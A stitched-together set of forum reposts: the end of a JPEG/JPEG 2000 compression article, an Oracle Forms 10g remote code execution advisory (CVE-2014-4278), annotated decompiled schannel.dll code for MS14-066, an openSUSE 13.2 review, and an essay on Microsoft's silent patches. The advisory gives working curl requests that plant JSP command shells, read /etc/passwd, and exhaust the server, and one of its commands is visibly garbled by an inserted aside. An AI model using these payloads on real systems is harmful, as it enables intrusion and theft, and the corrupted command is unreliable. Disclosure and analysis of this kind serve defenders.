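The 8-point transform just described is easy to compute directly; a sketch using this normalization (C0 = 1/√2, Cw = 1 otherwise), with the 2-D version obtained by transforming the rows and then the columns:

```python
import math

def dct1d(f):
    """8-point DCT-II: F[w] = (C_w/2) * sum_x f[x] cos((2x+1) w pi / 16)."""
    N = len(f)
    return [0.5 * (1 / math.sqrt(2) if w == 0 else 1.0) *
            sum(f[x] * math.cos((2 * x + 1) * w * math.pi / (2 * N)) for x in range(N))
            for w in range(N)]

def idct1d(F):
    """Inverse: f[x] = (1/2) * sum_w C_w F[w] cos((2x+1) w pi / 16)."""
    N = len(F)
    return [0.5 * sum((1 / math.sqrt(2) if w == 0 else 1.0) * F[w] *
                      math.cos((2 * x + 1) * w * math.pi / (2 * N)) for w in range(N))
            for x in range(N)]

def dct2d(block):
    """Apply the DCT to each row, then to each column of the result."""
    rows = [dct1d(row) for row in block]
    return [list(r) for r in zip(*[dct1d(list(col)) for col in zip(*rows)])]
```

With this scaling the transform is orthonormal for N = 8, so `idct1d(dct1d(f))` reproduces `f` up to floating-point error; a production codec would use a fast DCT rather than this direct O(N²) sum.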
We store these coefficients in another 8 by 8 block as shown: Notice that when we move down or to the right, we encounter coefficients corresponding to higher frequencies, which we expect to be less significant. The DCT coefficients may be efficiently computed through a Fast Discrete Cosine Transform, in the same spirit that the Fast Fourier Transform efficiently computes the Discrete Fourier Transform.

Quantization

Of course, the coefficients Fw,u are real numbers, which will be stored as integers. This means that we will need to round the coefficients; as we'll see, we do this in a way that facilitates greater compression. Rather than simply rounding the coefficients Fw,u, we will first divide by a quantizing factor and then record

round(Fw,u / Qw,u)

This allows us to emphasize certain frequencies over others. More specifically, the human eye is not particularly sensitive to rapid variations in the image. This means we may deemphasize the higher frequencies, without significantly affecting the visual quality of the image, by choosing a larger quantizing factor for higher frequencies. Remember also that, when a JPEG file is created, the algorithm asks for a parameter to control the quality of the image and how much the image is compressed. This parameter, which we'll call q, is an integer from 1 to 100. You should think of q as being a measure of the quality of the image: higher values of q correspond to higher quality images and larger file sizes. From q, a quantity α is created using

α = 50/q for 1 ≤ q ≤ 50, and α = (100 − q)/50 for 50 ≤ q ≤ 99

Here is a graph of α as a function of q: Notice that higher values of q give lower values of α. We then round the weights as

round(Fw,u / (α Qw,u))

Naturally, information will be lost through this rounding process. When either α or Qw,u is increased (remember that large values of α correspond to smaller values of the quality parameter q), more information is lost, and the file size decreases. Here are typical values for Qw,u recommended by the JPEG standard.
First, for the luminance coefficients: and for the chrominance coefficients: These values are chosen to emphasize the lower frequencies. Let's see how this works in our example. Remember that we have the following blocks of values:

[Images of the Y, Cb, and Cr blocks of DCT coefficients]

Quantizing with q = 50 gives the following blocks:

[Images of the quantized Y, Cb, and Cr blocks]

The entry in the upper left corner essentially represents the average over the block. Moving to the right increases the horizontal frequency while moving down increases the vertical frequency. What is important here is that there are lots of zeroes. We now order the coefficients as shown below so that the lower frequencies appear first. In particular, for the luminance coefficients we record

20 -7 1 -1 0 -1 1 0 0 0 0 0 0 0 -2 1 1 0 0 0 0 ... 0

Instead of recording all the zeroes, we can simply say how many appear (notice that there are even more zeroes in the chrominance weights). In this way, the sequences of DCT coefficients are greatly shortened, which is the goal of the compression algorithm. In fact, the JPEG algorithm uses extremely efficient means to encode sequences like this. When we reconstruct the DCT coefficients, we find

[Images comparing the original and reconstructed Y, Cb, and Cr coefficient blocks]

Reconstructing the image from the information is rather straightforward. The quantization matrices are stored in the file so that approximate values of the DCT coefficients may be recomputed. From here, the (Y, Cb, Cr) vector is found through the Inverse Discrete Cosine Transform.
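The quantize/dequantize round trip described in this section can be sketched as follows; the α scaling is the common libjpeg-style choice, and the small matrix Q below is a stand-in for illustration, not the full 8 by 8 table from the standard:

```python
def alpha(q):
    """Scaling factor from the quality parameter q (1..99):
    large alpha (low q) discards more information."""
    return 50.0 / q if q < 50 else (100 - q) / 50.0

def quantize(F, Q, q):
    """Record round(F[u][w] / (alpha * Q[u][w])) -- this is where information is lost."""
    a = alpha(q)
    return [[round(F[u][w] / (a * Q[u][w])) for w in range(len(F[0]))]
            for u in range(len(F))]

def dequantize(Fq, Q, q):
    """Reconstruction recovers only approximate coefficients."""
    a = alpha(q)
    return [[Fq[u][w] * a * Q[u][w] for w in range(len(Fq[0]))]
            for u in range(len(Fq))]

# Toy 2x2 example with a hypothetical quantization matrix:
F = [[80.0, -6.5], [4.2, 1.1]]
Q = [[16, 11], [12, 14]]
print(dequantize(quantize(F, Q, 50), Q, 50))
```

Notice how the small high-frequency coefficients quantize to zero and are lost, while the large upper-left (average) entry survives almost exactly.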
Then the (R, G, B) vector is recovered by inverting the color space transform. Here is the reconstruction of the 8 by 8 block with the parameter q set to 50

[Images: Original and Reconstructed (q = 50)]

and, below, with the quality parameter q set to 10. As expected, the higher value of the parameter q gives a higher quality image.

[Images: Original and Reconstructed (q = 10)]

JPEG 2000

While the JPEG compression algorithm has been quite successful, several factors created the need for a new algorithm, two of which we will now describe. First, the JPEG algorithm's use of the DCT leads to discontinuities at the boundaries of the 8 by 8 blocks. For instance, the color of a pixel on the edge of a block can be influenced by that of a pixel anywhere in the block, but not by an adjacent pixel in another block. This leads to blocking artifacts demonstrated by the version of our image created with the quality parameter q set to 5 (by the way, the size of this image file is only 1702 bytes) and explains why JPEG is not an ideal format for storing line art. In addition, the JPEG algorithm allows us to recover the image at only one resolution. In some instances, it is desirable to also recover the image at lower resolutions, allowing, for instance, the image to be displayed at progressively higher resolutions while the full image is being downloaded. To address these demands, among others, the JPEG 2000 standard was introduced in December 2000. While there are several differences between the two algorithms, we'll concentrate on the fact that JPEG 2000 uses a wavelet transform in place of the DCT. Before we explain the wavelet transform used in JPEG 2000, we'll consider a simpler example of a wavelet transform.
As before, we'll imagine that we are working with luminance-chrominance values for each pixel. The DCT worked by applying the transform to one row at a time, then transforming the columns. The wavelet transform will work in a similar way. To this end, we imagine that we have a sequence f0, f1, ..., fn describing the values of one of the three components in a row of pixels. As before, we wish to separate rapid changes in the sequence from slower changes. To this end, we create a sequence of wavelet coefficients:

a2k = (f2k + f2k+1)/2 and a2k+1 = (f2k − f2k+1)/2

Notice that the even coefficients record the average of two successive values--we call this the low pass band since information about high frequency changes is lost--while the odd coefficients record the difference in two successive values--we call this the high pass band as high frequency information is passed on. The number of low pass coefficients is half the number of values in the original sequence (as is the number of high pass coefficients). It is important to note that we may recover the original f values from the wavelet coefficients, as we'll need to do when reconstructing the image:

f2k = a2k + a2k+1 and f2k+1 = a2k − a2k+1

We reorder the wavelet coefficients by listing the low pass coefficients first followed by the high pass coefficients. Just as with the 2-dimensional DCT, we may now apply the same operation to transform the wavelet coefficients vertically. This results in a 2-dimensional grid of wavelet coefficients divided into four blocks by the low and high pass bands: As before, we use the fact that the human eye is less sensitive to rapid variations to deemphasize the rapid changes seen with the high pass coefficients through a quantization process analogous to that seen in the JPEG algorithm. Notice that the LL region is obtained by averaging the values in a 2 by 2 block and so represents a lower resolution version of the image. In practice, our image is broken into tiles, usually of size 64 by 64. The reason for choosing a power of 2 will be apparent soon.
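The pairwise average/difference transform and its inverse can be sketched directly; the normalization here (halved differences) is one consistent choice, assumed rather than taken verbatim from the article's (missing) formulas:

```python
def wavelet_step(f):
    """One level: low pass = pairwise averages, high pass = pairwise halved differences."""
    low  = [(f[2 * k] + f[2 * k + 1]) / 2 for k in range(len(f) // 2)]
    high = [(f[2 * k] - f[2 * k + 1]) / 2 for k in range(len(f) // 2)]
    return low + high          # low pass band listed first, as in the text

def wavelet_inverse(coeffs):
    """Recover the original values: f[2k] = a + d, f[2k+1] = a - d."""
    h = len(coeffs) // 2
    low, high = coeffs[:h], coeffs[h:]
    out = []
    for a, d in zip(low, high):
        out += [a + d, a - d]
    return out

row = [48, 52, 60, 64, 72, 76, 70, 66]
assert wavelet_inverse(wavelet_step(row)) == row
```

Applying `wavelet_step` again to just the low pass half would produce the next, even lower-resolution approximation, which is exactly how the multi-resolution LL pyramid is built.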
We'll demonstrate using our image with the tile indicated. (This tile is 128 by 128 so that it may be more easily seen on this page.) Notice that, if we transmit the coefficients in the LL region first, we could reconstruct the image at a lower resolution before all the coefficients had arrived, one of the aims of the JPEG 2000 algorithm. We may now perform the same operation on the lower resolution image in the LL region, thereby obtaining images of lower and lower resolution. The wavelet coefficients may be computed through a lifting process. The advantage is that the coefficients may be computed without using additional computer memory--a0 first replaces f0 and then a1 replaces f1. Also, in the wavelet transforms that are used in the JPEG 2000 algorithm, the lifting process enables faster computation of the coefficients.

The JPEG 2000 wavelet transform

The wavelet transform described above, though similar in spirit, is simpler than the ones proposed in the JPEG 2000 standard. For instance, it is desirable to average over more than two successive values to obtain greater continuity in the reconstructed image and thus avoid phenomena like blocking artifacts. One of the wavelet transforms used is the Le Gall (5,3) spline, in which the high pass (odd) and low pass (even) coefficients are computed by

a2k+1 = f2k+1 − ⌊(f2k + f2k+2)/2⌋ and a2k = f2k + ⌊(a2k−1 + a2k+1 + 2)/4⌋

As before, this transform is invertible, and there is a lifting scheme for performing it efficiently. Another wavelet transform included in the standard is the Cohen-Daubechies-Feauveau 9/7 biorthogonal transform, whose details are a little more complicated to describe, though a simple lifting recipe exists to implement it. It is worthwhile to compare JPEG and JPEG 2000. Generally speaking, the two algorithms have similar compression ratios, though JPEG 2000 requires more computational effort to reconstruct the image.
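The reversible integer form of the Le Gall (5,3) transform can be sketched with its two lifting steps; boundary handling here uses simple index clamping rather than the standard's symmetric extension, so this is an illustration, not a conformant implementation:

```python
def legall53_forward(x):
    """One level of 5/3 lifting: predict (high pass), then update (low pass)."""
    n = len(x)
    assert n % 2 == 0 and n >= 4
    # Predict step: detail = odd sample minus the floored average of its even neighbors.
    d = [x[2 * k + 1] - (x[2 * k] + x[min(2 * k + 2, n - 2)]) // 2
         for k in range(n // 2)]
    # Update step: smooth = even sample plus a rounded average of neighboring details.
    s = [x[2 * k] + (d[max(k - 1, 0)] + d[k] + 2) // 4
         for k in range(n // 2)]
    return s, d

def legall53_inverse(s, d):
    """Undo the lifting steps in reverse order -- reconstruction is exact."""
    n = 2 * len(s)
    x = [0] * n
    for k in range(len(s)):
        x[2 * k] = s[k] - (d[max(k - 1, 0)] + d[k] + 2) // 4
    for k in range(len(d)):
        x[2 * k + 1] = d[k] + (x[2 * k] + x[min(2 * k + 2, n - 2)]) // 2
    return x

samples = [3, 7, 1, 8, 2, 9, 4, 6]
assert legall53_inverse(*legall53_forward(samples)) == samples
```

Because each lifting step only adds an integer function of the other band, it can be undone exactly by subtracting the same quantity, which is why integer arithmetic (and in-place computation) causes no loss at all.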
JPEG 2000 images do not show the blocking artifacts present in JPEG images at high compression ratios but rather become more blurred with increased compression. JPEG 2000 images are often judged by humans to be of a higher quality. At this time, JPEG 2000 is not widely supported by web browsers but is used in digital cameras and medical imagery. There is also a related standard, Motion JPEG 2000, used in the digital film industry.

References

Home pages for the JPEG committee and JPEG 2000 committee
Tinku Acharya, Ping-Sing Tsai, JPEG2000 Standard for Image Compression: Concepts, Algorithms and VLSI Architectures, Wiley, Hoboken, 2005.
Jin Li, Image Compression: The Mathematics of JPEG 2000, Modern Signal Processing, Volume 46, 2003.
Ingrid Daubechies, Ten Lectures on Wavelets, SIAM, Philadelphia, 1992.
K.R. Rao, Patrick Yip, Discrete Cosine Transform: Algorithms, Advantages, Applications, Academic Press, San Diego, 1990.
Wikipedia entries for JPEG and JPEG 2000.

Sursa: Feature Column from the AMS
-
Advisory: Oracle Forms 10g Unauthenticated Remote Code Execution (CVE-2014-4278)

Khai Tran | October 14, 2014

Vulnerability Description: Oracle Forms 10g contains code that does not properly validate user input. This could allow an unauthenticated user to execute arbitrary commands on the remote Oracle Forms server. Also affected: Oracle E-Business Suite 12.0.6, 12.1.3, 12.2.2, 12.2.3 and 12.2.4 [1]

Vulnerability Details: When a user launches a new Oracle Forms application, the application first invokes the FormsServlet class to initiate the connection. The application then invokes the ListenerServlet class, which launches the frmweb process in the background on the remote server. The normal URL to invoke ListenerServlet looks like:

http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1

With the above URL, the normal frmweb process is started with the following parameters:

frmweb server webfile=HTTP-0,0,0,em_mode,127.0.0.1

where the ifip parameter is controllable by user input. The frmweb executable, however, accepts one more parameter:

frmweb server webfile=HTTP-0,0,0,em_mode,127.0.0.1,logfile

A log file, named based on the user-supplied log name, is created on the server following the request.
The content of the log file contains the log file name:

FORMS CONNECTION ACTIVITY LOG FILE
Developer:Forms/LogRecord
[Fri May 9 16:46:58 2014 EDT]::Server Start-up Data:
Server Log Filename: logfile
Server Hostname: oralin6u5x86
Server Port: 0
Server Pool: 1
Server Process Id: 15638

The Oracle Forms application does not perform adequate input validation on the logfile parameter and allows directory traversal sequences (../). By controlling the ifip parameter passed to the ListenerServlet class, an attacker can now control the log file location and, partially, its content as well. Combined with the weak configuration of the remote web server, which allows jsp files to be served under the http://host:port/forms/java location, an attacker could upload a remote shell and execute arbitrary code on the server.

Technical challenges: The web server does not seem to accept white spaces or new lines; it also limits the number of characters that can be passed on to the frmweb executable. To execute operating system commands, a custom JSP shell that bypasses these restrictions was developed.

Verification: Proof-of-concept exploit (tested with Oracle Development Suite 10.1.2.0.2, installed on Oracle Linux 5u6):

Upload the first shell to execute commands (see Other Notes for the decoded version):

curl --request GET 'http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1,./java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp'

After the first step, the attacker can execute OS commands via the blind shell, located at: http://127.0.0.1:8889/forms/java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp.
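The first request above can also be assembled programmatically; a sketch that simply URL-encodes the JSP payload into the ifip parameter (the host is the advisory's own test target, and the code only builds the string, it does not send anything; the exact percent-encoding differs slightly from the hand-crafted curl command):

```python
from urllib.parse import quote

host = "127.0.0.1:8889"
# The payload ends up in the frmweb log file name under /forms/java/,
# so the web server later serves it back as an executable JSP page.
jsp_payload = '<%java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"));%>'

url = ("http://" + host + "/forms/lservlet"
       "?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5"
       "&ifcmd=getinfo&ifip=127.0.0.1,./java/" + quote(jsp_payload) + ".jsp")
print(url)
```

The key point the sketch makes explicit is that everything after the comma in ifip travels verbatim into the frmweb command line as the log file argument.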
To retrieve the command results, the attacker can use the first blind shell to write a second JSP shell, based on fuzzdb's cmd.jsp [3]:

curl --request GET 'http://127.0.0.1:8889/forms/java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp?cmd=/bin/sh&cmd=-c&cmd=echo%20PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKiIlPjwlU3RyaW5nIG9wPSIiLHM9IiI7dHJ5e1Byb2Nlc3MgcD1SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7QnVmZmVyZWRSZWFkZXIgc0k9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihwLmdldEludXB1dFN0cmVhbSk=' is abbreviated here; the full payload is the base64 blob from the advisory: PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKiIlPjwlU3RyaW5nIG9wPSIiLHM9IiI7dHJ5e1Byb2Nlc3MgcD1SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7QnVmZmVyZWRSZWFkZXIgc0k9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihwLmdldEludcHV0U3RyZWFtKCkpKTt3aGlsZSgocz1zSS5yZWFkTGluZSgpKSE9bnVsbCl7b3ArPXM7fX1jYXRjaChJT0V4Y2VwdGlvbiBlKXtlLnByaW50U3RhY2tUcmFjZSgpO30lPjwlPW9wJT4%3d|base64%20--decode%3E./forms/java/cmd.jsp'

The second shell is now available at http://127.0.0.1:8889/forms/java/cmd.jsp. To get the content of /etc/passwd on the remote server:

curl --request GET 'http://127.0.0.1:8889/forms/java/cmd.jsp?cmd=cat+/etc/passwd'

Recommendations for Oracle: Create a whitelist of characters that are allowed to appear in the input and accept input composed exclusively of characters in the approved set. Consider removing support for jsp files on the remote web server if it is not required.
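The whitelist recommendation could look something like the following sketch. The approved character set here is an assumption for demonstration; the point is that it rejects the comma used to smuggle an extra frmweb argument, the "/" needed for traversal, and JSP metacharacters outright:

```python
import re

# Illustrative whitelist validation for a parameter like ifip/logfile.
# The allowed set below is an assumption, not Oracle's actual fix.
ALLOWED = re.compile(r"[A-Za-z0-9._-]+")

def is_safe_param(value: str) -> bool:
    # Accept only input composed exclusively of approved characters,
    # and refuse traversal sequences as defense in depth.
    return bool(ALLOWED.fullmatch(value)) and ".." not in value

print(is_safe_param("127.0.0.1"))                    # True
print(is_safe_param("127.0.0.1,../java/shell.jsp"))  # False
```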
Other notes:

URL-decoded version of the first blind JSP shell:

<%java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"));%>

Base64-decoded version of the second JSP shell:

<%@page import="java.io.*"%><%String op="",s="";try{Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s=sI.readLine())!=null){op+=s;}}catch(IOException e){e.printStackTrace();}%><%=op%>

Oracle Forms 10g is also vulnerable to a simple DoS attack: each time the URL http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1 is invoked, an frmweb process is launched in the background. An attacker could exhaust server resources simply by requesting the same URL multiple times. I believe this behavior is fixed in version 11g and onwards with connection pooling.

For Oracle Forms 11g and onwards, it is still possible to inject into the command arguments of the frmweb executable, through a different vector. However, the frmweb executable does not seem to recognize that last argument as the log file location; therefore another vulnerability may be required in order to gain code execution.

Since Oracle has ended its support for Forms 10g [2], the patch for Forms 10g itself was not released in the October 2014 CPU [1]. However, the Forms 10g component is still being used in E-Business Suite; therefore a patch for it was released [1]. If your organization is still using Oracle Forms 10g, I would recommend backporting the fix from E-Business Suite, or upgrading to Forms version 11 or newer.

Report Timeline:

May 15, 2014: vulnerability reported to Oracle.
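The payload-preparation step from the PoC can be reproduced offline. This sketch base64-encodes the decoded shell shown above, the same transformation the attacker performs before piping it through `base64 --decode` on the server:

```python
import base64

# Reproduce the encoding step: the JSP shell is base64-encoded so it
# survives the server's no-whitespace restriction, then decoded
# server-side. The shell body is the decoded version from this advisory.
jsp_shell = (
    '<%@page import="java.io.*"%><%String op="",s="";'
    'try{Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));'
    'BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));'
    'while((s=sI.readLine())!=null){op+=s;}}'
    'catch(IOException e){e.printStackTrace();}%><%=op%>'
)

encoded = base64.b64encode(jsp_shell.encode()).decode()
# Round-trips cleanly, and reproduces the PCVAcGFn... blob used in the
# curl command above.
assert base64.b64decode(encoded).decode() == jsp_shell
print(encoded[:24])
```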
June 18, 2014: vulnerability confirmed by Oracle.
October 14, 2014: patch released.

References:

[1] Oracle Critical Patch Update - October 2014
[2] https://blogs.oracle.com/grantronald/entry/alert_for_forms_customers_running_oracle_forms_10g
[3] https://github.com/rustyrobot/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp

Sursa: https://blog.netspi.com/advisory-oracle-forms-10g-unauthenticated-remote-code-execution-cve-2014-4278/
-
MS14-066 schannel.dll SPVerifySignature (Windows 2003 SP2) /* Summarizing the most likely conditions here these bugs occur: Code Execution: Heap smash via qmemcpy() if CryptDecodeObject() returns more than 40 bytes in pcbStructInfo Verification Bypass: A failed decode results in a positive return value. This is not STATUS_SUCCESS, but a caller that is checking <0 vs == 0 would think verification succeeded on a bad decode. */ //----- (7676F6D4) -------------------------------------------------------- int __stdcall SPVerifySignature(HCRYPTPROV hProv, int a2, ALG_ID Algid, BYTE *pbData, DWORD dwDataLen, BYTE *pbEncoded, DWORD cbEncoded, int a8) { signed int v8; // esi@4 BOOL v9; // eax@8 DWORD v10; // eax@14 DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@11 HCRYPTKEY phKey; // [sp+10h] [bp-38h]@1 HCRYPTHASH phHash; // [sp+14h] [bp-34h]@1 BYTE *pbSignature; // [sp+18h] [bp-30h]@1 char pvStructInfo[40]; // [sp+1Ch] [bp-2Ch]@11 phKey = 0; phHash = 0; pbSignature = 0; if ( hProv && a2 ) { // Allocate cbEncoded bytes on the heap for the signature pbSignature = (BYTE *)SPExternalAlloc(cbEncoded); if ( !pbSignature ) { // Exit early if the allocation failed v8 = -2146893056; goto LABEL_18; } // Import the key and create the hash, bailing out if it fails if ( !CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey) || !CryptCreateHash(hProv, Algid, 0, 0, &phHash) ) goto LABEL_12; // Verify that CryptHashData or CryptSetHashParam succeeds (but how is a8 being set?) v9 = a8 ? 
CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0); if ( !v9 ) goto LABEL_12; if ( *(_DWORD *)(*(_DWORD *)a2 + 4) == 8704 ) { // Indicate that we have 40 bytes to decode the signature value pcbStructInfo = 40; // CryptDecodeObject() states that pvStructInfo can be larger than pcbStructInfo // Bail out if the decode fails /* BOOL WINAPI CryptDecodeObject( _In_ DWORD dwCertEncodingType, (X509_ASN_ENCODING) _In_ LPCSTR lpszStructType, (X509_DSS_SIGNATURE) _In_ const BYTE *pbEncoded, (Caller) _In_ DWORD cbEncoded, (Caller) _In_ DWORD dwFlags, (0) _Out_ void *pvStructInfo, (40 byte stack variable) _Inout_ DWORD *pcbStructInfo (in:40, out:arbitrary) ); pcbStructInfo [in, out]: A pointer to a DWORD value specifying the size, in bytes, of the buffer pointed to by the pvStructInfo parameter. When the function returns, this DWORD value contains the size of the decoded data copied to pvStructInfo. The size contained in the variable pointed to by pcbStructInfo can indicate a size larger than the decoded structure, as the decoded structure can include pointers to other structures. This size is the sum of the size needed by the decoded structure and other structures pointed to. */ if ( !CryptDecodeObject(X509_ASN_ENCODING, X509_DSS_SIGNATURE, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) ) { LABEL_12: // this might be the signature bypass vector if the caller incorrectly checks <0 vs STATUS_SUCCESS GetLastError(); v8 = 3; goto LABEL_18; } v10 = pcbStructInfo; // This is likely our RCE vector, if pcbStructInfo > cbEncoded qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo); // Changes cbEncoded to the (possibly bad) returned value of pcbStructInfo cbEncoded = v10; } else { ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded); } v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 
0 : -2147483391; } else { v8 = -1; } LABEL_18: if ( phKey ) CryptDestroyKey(phKey); if ( phHash ) CryptDestroyHash(phHash); if ( pbSignature ) SPExternalFree(pbSignature); return v8; } Sursa: https://gist.github.com/hmoore-r7/3379af8b0419ddb0c76b
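The "verification bypass" summarized at the top of the listing comes down to a return-code convention mismatch. A small Python simulation (constants taken from the listing; the caller logic is hypothetical, standing in for any consumer of SPVerifySignature):

```python
# Return values visible in the listing above.
STATUS_SUCCESS = 0      # CryptVerifySignatureA succeeded
DECODE_FAILED = 3       # set at LABEL_12 when CryptDecodeObject fails
VERIFY_FAILED = -2147483391   # CryptVerifySignatureA returned 0
ALLOC_FAILED = -2146893056    # SPExternalAlloc returned NULL

def sloppy_caller(ret):
    # WRONG: treats every non-negative return as "signature verified",
    # so the positive decode-failure code 3 passes as success.
    return ret >= 0

def strict_caller(ret):
    # RIGHT: only an exact STATUS_SUCCESS means verification succeeded.
    return ret == STATUS_SUCCESS

assert strict_caller(DECODE_FAILED) is False
assert sloppy_caller(DECODE_FAILED) is True   # bad decode looks "verified"
```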
-
OpenSUSE 13.2

OpenSUSE 13.2 supercharged with smoother setup, system snapshots, Btrfs, and more

Chris Hoffman @chrisbhoffman

OpenSUSE 13.2 was released a week ago. As with the recent Fedora update, the latest release of openSUSE took a year to develop instead of the standard six months as the organization retooled its development practices. SUSE Linux has now been around for over 20 years, and it’s still going strong. As usual, the latest release serves as a foundation for developing Novell’s SUSE Linux Enterprise and brings some significant new improvements. So let’s dive right in!

A streamlined installer

OpenSUSE provides live media, and that live media can now be persistent. This means you could set up a live openSUSE 13.2 USB stick and have your files and settings saved on it between uses. But openSUSE still recommends using an old-fashioned 4.7GB DVD installer disc for actually installing the operating system on your computer. The installer lets you choose your preferred desktop—GNOME, KDE, or another one. GNOME and KDE are on fairly equal footing in openSUSE these days, but the openSUSE community has always loved KDE. KDE 4.14 is the default, although GNOME users will also be right at home.

The openSUSE installer has seen a lot of much-needed polish and streamlining. Previously, the installer had a “phase 2”—first it installed on your system, and then you’d reboot into your new system and be forced to go through an additional setup process. Now the installer does everything during the standard installation process, and there is no phase 2. The installer also has a “brand new look and feel focused on usability,” and configuration screens like LDAP user authentication and printer setup have been removed. You can adjust these settings after you install the system, if you need to.

Btrfs and file system snapshots

OpenSUSE uses the new Btrfs file system by default. If you prefer another Linux distribution, it will probably start using Btrfs soon, too.
It’s clear that this is the future file system that will replace ext4, so the only question is when it’s stable enough for Linux distributions to flip the switch. OpenSUSE has decided the time is now. Btrfs is sometimes pronounced “better FS,” and that’s what it is. It’s faster, more robust, and more modern. One of its most interesting features is the ability to create file system snapshots. OpenSUSE uses this to great effect, providing a boot menu option that allows you to boot straight into previous snapshots via the “Snapper” tool. This is great for recovering from system problems, as it allows you to boot straight into an older file system state from before corruption and other problems occurred.

The snapshot feature is also available in the just-released SUSE Linux Enterprise Server 12. This is an enterprise-grade feature—not just a new-and-unstable toy.

Yet another faster setup tool

The YaST configuration tool—literally an abbreviation for “Yet another Setup Tool”—is used for system configuration. This has always been one of SUSE’s most distinctive features. In the past, it’s sometimes been overly slow and clunky, but it also provides a one-stop graphical configuration interface for practically everything you’d want to do when configuring a Linux system, from modifying your bootloader’s menu to configuring various different types of servers.

OpenSUSE 13.2’s YaST on the KDE desktop environment.

In openSUSE 13.1, YaST was rewritten in the Ruby programming language. They’ve now had time to polish that work further. YaST is now faster, more stable, and better integrated with Btrfs, systemd, and other modern technologies.
The usual upgrades

As usual with Linux distribution updates, many—if not most—of the changes you’ll see are just the result of upgrading to the latest versions of the various upstream software packages. This means Linux kernel 3.16, KDE 4.14, and GNOME 3.14. OpenSUSE’s repositories now include the MATE desktop, too—good news for GNOME 2 diehards! A preview of KDE’s new Plasma 5.1 desktop is also available. For more details about all the various changes, check out the official list of major features.

Sursa: OpenSUSE 13.2 Linux adds smoother setup, system snapshots, Btrfs, more
-
We're taking to the streets — I like the protests.
-
Microsoft's silent, secret security updates

Summary: Does Microsoft find and fix security problems in their own products? You might assume so, but the company gives no reason to believe it. I assume they do, but silently.

By Larry Seltzer for Zero Day | November 12, 2014 -- 13:00 GMT (05:00 PST)

It's an odd and conspicuous feature of Microsoft's security bulletins that they never report vulnerabilities found internally at Microsoft. All of the credits go to outsiders. For example, yesterday's Patch Tuesday updates fixed 32 identified vulnerabilities, none of which were credited to Microsoft. These companies, bug bounty programs and individuals were credited:

Baidu Security Team (X-Team)
Context Information Security
EY
Esage Lab
Google Project Zero
Google Security Team
HP's Zero Day Initiative
IBM X-Force
Kaspersky Lab
KoreLogic Security
McAfee Security Team
Palo Alto Networks
Qihoo 360
Secunia Research
Two unaffiliated individuals: Takeshi Terada, Daniel Trebbien

I eyeballed every disclosure released this year and saw no vulnerabilities credited to Microsoft. I've been following this for many years and can say that it's always been thus. There are some vaguer cases. The blockbuster Schannel vulnerability in MS14-066 is stated to be "privately-reported" but no credit is given; this happens now and then, perhaps ten times this year. Sometimes the credited party is named with no organizational affiliation, as with the two individuals in the list above, but I've checked a bunch of these and none of them are Microsoft people. Sometimes the credited party is anonymous, but always reported as an outsider reporting to Microsoft. (As an aside, with this month Microsoft has started putting all the credits in a single acknowledgements page rather than spreading them around the individual security bulletins.)

Does Microsoft actually never find vulnerabilities in their own products? This is hard to believe. Both Google and Apple regularly give credit to internal researchers.
If Microsoft does find vulnerabilities, what's happening to them? Does Microsoft just not fix them? Do they pass them on to friends who get bug bounties from HP's ZDI (Zero Day Initiative)? Or maybe Microsoft or their employees go directly to ZDI. Consider these two credits from the August Cumulative Security Update for Internet Explorer:

An anonymous researcher, working with HP's Zero Day Initiative, for reporting the Internet Explorer Memory Corruption Vulnerability (CVE-2014-4052)
Sky, working with HP's Zero Day Initiative, for reporting the Internet Explorer Memory Corruption Vulnerability (CVE-2014-4058)

Who's to say these aren't Microsoft employees? But I think it's more likely Microsoft is hiding security updates inside other updates, such as non-security updates. Consider the episode a few months ago when Microsoft had to pull a number of updates after they borked users' systems. One of those updates was an "Update to support the new currency symbol for the Russian ruble in Windows." This is one of the updates that caused systems to go into infinite reboot loops. Just for adding a new ruble symbol to the system you get that kind of catastrophic failure? Perhaps there was more to it.

Alternatively, Microsoft could be hiding security updates inside of other security updates. There have been ten Cumulative Updates for Internet Explorer so far this year. It would be easy to hide another patch in one of those. In the September Cumulative Update Microsoft said "In addition to the changes that are listed for the vulnerabilities described in this bulletin, this update includes defense-in-depth updates to the Internet Explorer XSS Filter to help improve security-related features." The same text is in the June Cumulative Update. That's some pretty elastic description there, and Cumulative Updates, by definition, are large and complicated.
